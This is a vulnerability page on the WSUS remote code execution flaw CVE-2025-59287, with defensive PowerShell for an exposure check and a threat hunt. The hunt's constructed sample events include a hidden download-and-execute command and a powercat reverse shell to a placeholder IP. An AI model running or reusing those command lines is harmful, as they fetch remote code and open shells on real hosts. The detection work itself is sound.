Remote Code Execution Vulnerability in Windows Server Update Service by Microsoft
CVE-2025-59287

9.8 CRITICAL


What is CVE-2025-59287?

CVE-2025-59287 is a critical remote code execution vulnerability in Windows Server Update Services (WSUS), developed by Microsoft. WSUS is the on-premises server role that downloads updates from Microsoft Update and distributes them to the Windows hosts it manages, so it is normally a trusted and well-connected system inside a corporate network. The flaw is a deserialization of untrusted data (CWE-502): an unauthenticated attacker who can reach the WSUS service over the network sends a crafted request whose contents the server deserializes, and the resulting object graph leads to arbitrary code execution in the context of the WSUS server process. No privileges and no user interaction are required. Successful exploitation gives full control of the affected server and, through it, a foothold in the environment that WSUS serves.

Because every managed client is configured to trust the WSUS server for code it installs, a compromised WSUS host is worse than one lost server: an attacker who controls it can tamper with the update pipeline or use the server's network position and stored credentials to reach other systems. Organizations at greatest risk are those whose WSUS ports (TCP 8530 for HTTP and 8531 for HTTPS by default) are reachable from untrusted networks, including the internet.

Potential impact of CVE-2025-59287

  1. Unauthorized System Access: The ability for an attacker to execute code remotely means they can gain unauthorized access to sensitive systems and data. This could lead to further exploitation within the network, allowing for lateral movement to other critical assets.

  2. Data Breaches and Loss: Once an attacker has control, they can exfiltrate confidential information, leading to severe data breaches. This impact can be detrimental to an organization’s reputation, customer trust, and financial status.

  3. Disruption of Operations: The exploitation of this vulnerability could result in significant disruption, where attackers may execute attacks designed to disable or impair services. Such disruptions can lead to operational paralysis, affecting productivity and potentially leading to financial losses due to downtime.

CISA has reported CVE-2025-59287

CISA provides regional cyber and physical services to support security and resilience across the United States. CISA monitors the most dangerous vulnerabilities and has identified CVE-2025-59287 as being exploited in the wild, but it is not known by CISA to be used in ransomware campaigns. This is subject to change at pace, as recent news articles suggest the vulnerability is being used by ransomware groups.

The CISA's recommendation is: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Affected Version(s)

Each entry gives the affected version range: builds from the version on the left up to, but not including, the version on the right are vulnerable, and the version on the right is the first fixed build. The entries below are those recorded on this page; the vendor advisory is authoritative for the complete list of affected Windows Server releases.

Windows Server 2012 (Server Core installation) x64-based Systems 6.2.9200.0 < 6.2.9200.25728

Windows Server 2012 R2 (Server Core installation) x64-based Systems 6.3.9600.0 < 6.3.9600.22826

Windows Server 2012 R2 x64-based Systems 6.3.9600.0 < 6.3.9600.22826
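The following PowerShell script is an added example, not code from the original page or from Microsoft, that turns the version list above into a pre-patch exposure check for a WSUS host. It assumes the fixed builds listed on this page, reads the installed build from the file version of ntoskrnl.exe (on the assumption that the kernel carries the current cumulative update's build number), and treats TCP 8530/8531 as the WSUS listening ports. The function names are the example's own.

```powershell
# Added example for CVE-2025-59287 exposure checking (not from the original page or Microsoft).
# Assumptions: fixed builds as listed above; ntoskrnl.exe file version reflects the installed
# cumulative update; WSUS listens on its default ports TCP 8530 (HTTP) and 8531 (HTTPS).

# First fixed build per OS build line (9200 = Server 2012, 9600 = Server 2012 R2), from the list above.
$FixedBuilds = @{
    '6.2.9200' = [version]'6.2.9200.25728'
    '6.3.9600' = [version]'6.3.9600.22826'
}

function Get-OsFileVersion {
    # Four-part file version of the kernel, e.g. 6.3.9600.22826 (assumption: updated by the cumulative update).
    $info = (Get-Item "$env:SystemRoot\System32\ntoskrnl.exe").VersionInfo
    return [version]('{0}.{1}.{2}.{3}' -f $info.FileMajorPart, $info.FileMinorPart, $info.FileBuildPart, $info.FilePrivatePart)
}

function Test-VulnerableBuild {
    # Returns $true if the build is below the fixed build, $false if patched,
    # $null if the OS build line is not one of those listed on this page.
    param([Parameter(Mandatory)][version]$Installed)
    $key = '{0}.{1}.{2}' -f $Installed.Major, $Installed.Minor, $Installed.Build
    if (-not $FixedBuilds.ContainsKey($key)) { return $null }
    return ($Installed -lt $FixedBuilds[$key])
}

function Get-WsusExposure {
    $installed = Get-OsFileVersion
    $vulnerableBuild = Test-VulnerableBuild -Installed $installed

    # WSUS role presence (ServerManager cmdlet; only available on Windows Server).
    $roleInstalled = $false
    if (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue) {
        $roleInstalled = [bool](Get-WindowsFeature -Name UpdateServices).Installed
    }

    # Is anything actually listening on the default WSUS ports?
    $listening = @(Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        Where-Object { $_.LocalPort -in 8530, 8531 } |
        Select-Object -ExpandProperty LocalPort -Unique)

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        InstalledBuild     = $installed
        BuildVulnerable    = $vulnerableBuild          # $null = not a build line listed on this page
        WsusRoleInstalled  = $roleInstalled
        WsusPortsListening = $listening
        # Exposed only when the role is present, a WSUS port is open, and the build is known-vulnerable.
        Exposed            = ($roleInstalled -and $listening.Count -gt 0 -and $vulnerableBuild -eq $true)
    }
}

Get-WsusExposure | Format-List
```

A `BuildVulnerable` of `$null` means the host runs an OS build line the page does not list, not that it is safe; check the vendor advisory for that release. Run the script on each WSUS server rather than on clients, since the vulnerable component is the server role, and pair the result with a firewall review of which networks can reach the listening ports.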

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate that the vulnerability can be exploited. A public PoC is also a key building block for weaponization: once it exists, the time between disclosure and use in ransomware or other intrusion campaigns shrinks, which is why a published PoC is treated here as a trigger to patch or mitigate immediately.

News Articles

Windows Server Vulnerability Exploited: ShadowPad Malware Deployed

CVE-2025-59287 vulnerability in Windows Server Update Services exploited to deploy ShadowPad malware. Learn how attackers used this flaw to gain access.

18 hours ago

Attackers deliver ShadowPad via newly patched WSUS RCE bug

Attackers exploited a patched WSUS flaw (CVE-2025-59287) to gain access, use PowerCat for a shell, and deploy the ShadowPad malware.

21 hours ago

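The articles above describe the post-exploitation step that follows the RCE: a shell spawned from the WSUS process, then a PowerCat reverse shell and the ShadowPad payload. The script below is an added example, not from the original page or the cited articles, of a process-creation hunt for that pattern. It assumes Security event 4688 with command-line auditing is enabled, that WSUS code executes inside the IIS worker (w3wp.exe) and the WSUS service (WsusService.exe) so those are the suspicious parent processes, and uses constructed sample events (not real telemetry) so the filter can be exercised offline.

```powershell
# Added example: hunt for shells spawned by the WSUS web stack (not from the original page).
# Assumptions: Security 4688 events with command-line logging; w3wp.exe and WsusService.exe
# are the parent processes that host WSUS code; the sample events below are constructed.

$SuspiciousParents = @('w3wp.exe', 'wsusservice.exe')
$ShellChildren     = @('cmd.exe', 'powershell.exe', 'pwsh.exe')

function ConvertFrom-ProcessCreationEvent {
    # Maps a raw 4688 EventRecord to a flat object by reading the named EventData fields from its XML.
    param([Parameter(Mandatory, ValueFromPipeline)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    process {
        $data = @{}
        foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            TimeCreated       = $Event.TimeCreated
            ParentProcessName = $data['ParentProcessName']
            NewProcessName    = $data['NewProcessName']
            CommandLine       = $data['CommandLine']
        }
    }
}

function Find-WsusSpawnedShell {
    # Emits one finding per event where a WSUS-hosting process starts a command shell.
    param([Parameter(Mandatory, ValueFromPipeline)][object]$Event)
    process {
        $parent = [IO.Path]::GetFileName([string]$Event.ParentProcessName).ToLower()
        $child  = [IO.Path]::GetFileName([string]$Event.NewProcessName).ToLower()
        if ($parent -in $SuspiciousParents -and $child -in $ShellChildren) {
            [pscustomobject]@{
                Time        = $Event.TimeCreated
                Parent      = $parent
                Child       = $child
                CommandLine = $Event.CommandLine
                Reason      = 'Shell spawned by a WSUS-hosting process'
            }
        }
    }
}

# Constructed sample events (not real telemetry): one benign, two matching the pattern.
$sample = @(
    [pscustomobject]@{
        TimeCreated       = [datetime]'2025-10-24T10:00:00'
        ParentProcessName = 'C:\Windows\System32\inetsrv\w3wp.exe'
        NewProcessName    = 'C:\Windows\System32\cmd.exe'
        CommandLine       = 'cmd.exe /c powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://203.0.113.10/pc.ps1'')"'
    }
    [pscustomobject]@{
        TimeCreated       = [datetime]'2025-10-24T10:05:00'
        ParentProcessName = 'C:\Windows\explorer.exe'
        NewProcessName    = 'C:\Windows\System32\cmd.exe'
        CommandLine       = 'cmd.exe'
    }
    [pscustomobject]@{
        TimeCreated       = [datetime]'2025-10-24T10:07:00'
        ParentProcessName = 'C:\Program Files\Update Services\Service\WsusService.exe'
        NewProcessName    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine       = 'powershell.exe -nop -c "powercat -c 203.0.113.10 -p 443 -e cmd"'
    }
)

# Offline run over the constructed sample: expect the first and third events to be reported.
$sample | Find-WsusSpawnedShell | Format-Table -AutoSize

# Live hunt over the last 7 days on a WSUS server (requires 4688 auditing to be enabled):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-7) } |
#     ConvertFrom-ProcessCreationEvent | Find-WsusSpawnedShell | Format-Table -AutoSize
```

On a healthy WSUS server the IIS worker and the WSUS service have no business starting cmd.exe or PowerShell, so any hit deserves a look at the full command line and at outbound connections from the server around that time; the parent-process names are the example's assumption about where WSUS code runs, so extend the list if your deployment hosts WSUS differently.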

EPSS Score

60%: an estimated 60% probability of exploitation activity in the wild within the next 30 days.

CVSS v3.1

Score: 9.8 (CRITICAL)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Timeline

  • 🥇 Vulnerability reached the number 1 worldwide trending spot
  • 🦅 CISA Reported
  • 📈 Vulnerability started trending
  • 🟡 Public PoC available
  • 💰 Used in Ransomware
  • 👾 Exploit known to exist
  • 📰 First article discovered by Dark Reading
  • Vulnerability published
  • Vulnerability Reserved
